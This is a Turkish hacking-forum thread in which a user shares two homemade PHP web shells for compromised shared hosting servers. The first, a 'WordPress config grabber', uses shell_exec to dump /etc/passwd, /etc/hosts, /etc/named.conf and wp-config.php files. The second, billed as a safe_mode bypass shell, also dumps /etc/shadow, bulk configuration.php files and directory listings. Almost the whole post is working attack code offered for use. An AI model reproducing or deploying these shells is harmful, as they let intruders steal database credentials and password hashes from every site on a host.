Spyhackerz.com Wordpress config Cekici (2 Viewers)

I

Isko~

Merhaba arkdaslar

Basit bir shell'dir ozelikleri ; passwd+named.conf + wordpress configleri ceker
Bunun gelismis shell'i de mevcut ama 0 Dan kendim yazdim (nekadar cok PHP bilmesemde ) ve sizinle paylasmak istedim :)


7XqnoW.jpg

PHP:
<center>
<title>Spyhackerz.com Bilgi Depo Shell</title>

<body bgcolor="#5c5b56">

<center><font size=25 color='#660000'>Spyhackerz Bilgi Depo Shell</font><img src="http://individual.icons-land.com/IconsPreview/People/PNG/Occupations/256x256/Spy_Female_Light.png" width="50" height="75" alt="" border=0>

<form method="post" action="">
<br>

<?php



//etc hosts
?>
<br>
<center><font size=16 color='red'>Passwd</font>

<?

$passwd=shell_exec("cat /etc/hosts"); echo "<br><textarea cols='35' rows='17'>"; echo $passwd."\n"; echo "</textarea>  ";


//etc passwd    coded by isko~



$passwd=shell_exec("cat /etc/passwd"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>   ";


//etc Sunucudaki siteler    coded by isko~

$named=shell_exec("cat /etc/named.conf"); echo "<textarea cols='85' rows='17'>"; echo $named."\n"; echo "</textarea>  <br><br> ";


//etc wordpress config gosterici kendi dizindeki


$passwd=shell_exec("cat /home/wbassman/public_html/*/wp-config.php"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea> <br><br>";

//etc wordpress toplu config gosterici kendi dizindeki


$passwd=shell_exec("cat /home/$users/public_html/wp-config.php"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea> <br><br>  ";


?>

<br>
coded by <b><font color='#00adad'>Isko~</b>
</form>
</center>
 
I

Isko~

PHP:
<?php
/*
************************************************************************
*                      Listeliyici [V1] safe_mode      Bypass Shell     *
************************************************************************
*                                                                      *
*          /      \                                                    *
*       \  \  ,,  /  /                                                 *
*        '-.`\()/`.-'                                                  *
*       .--_'(  )'_--.            * (C) 2012 Www.imhatimi.coM *        *
*      / /` /`""`\ `\ \                                                *
*       |  |  ><  |  |                                                 *
*       \  \      /  /              Mailto: [email protected]          *
*           '.__.'                                                     *
*                                                                      *
************************************************************************
*Coder: Iskorpion
*Http:// www.imhatimi.org
*selin.php Shell
*/
#Selin.PHP


?>
<body bgcolor="#000000">
<font color=FF8000>
<font face=arial>
<center><font color=ffffff>Kernel :</font> <?php echo @php_uname();?><br>
<font color=ffffff>PHP version :</font> <?php echo phpversion();?><br>

<br>

<center>
<title>Domain List Gosterici</title>
<center><font color='red'>Coded By Isko/font></center>
<br>

<center><font color='green'>Listele</font></center>
<form method="post" action="">
<?php
$passwd=shell_exec("ls -la"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>";
?>

<center><font color='green'>Domain List Gosterici</font></center>
<form method="post" action="">
<?php
$passwd=shell_exec("cat /etc/named.conf"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>";
?>
<br>

<center>

<center><font color='green'>Passwd Gosterici</font></center>
<form method="post" action="">
<?php
$passwd=shell_exec("cat /etc/passwd"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>";
?>

<center>

<center><font color='green'>Toplu Config Cekici</font></center>
<form method="post" action="">
<?php
$passwd=shell_exec("cat /home/*/public_html/configuration.php"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>";
?>

<center>

<center><font color='green'>Shadow Gosterici</font></center>
<form method="post" action="">
<?php
$passwd=shell_exec("cat /etc/shadow"); echo "<textarea cols='85' rows='17'>"; echo $passwd."\n"; echo "</textarea>";
?>
 

Users who are viewing this thread

Top